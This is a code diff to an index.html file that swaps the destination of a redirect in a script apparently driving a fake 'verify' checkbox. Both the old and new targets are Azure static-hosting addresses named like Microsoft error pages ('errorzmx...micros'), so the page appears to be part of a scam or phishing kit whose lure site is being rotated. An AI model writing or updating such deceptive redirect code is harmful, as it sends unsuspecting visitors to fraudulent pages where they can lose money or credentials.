--- a/index.html
+++ b/index.html
@@ -2096,7 +2096,7 @@ body {
   <script>
     const verifyBox = document.getElementById('verify-box');
     const check = document.getElementById('check');
-    const redirectUrl = 'https://errorzmx01micros.z13.web.core.windows.net/'; // Replace with your real destination
+    const redirectUrl = 'https://errorzmxisns10xmzinc.z13.web.core.windows.net/'; // Replace with your real destination
     let redirected = false;
     let hoverTimeout;
 
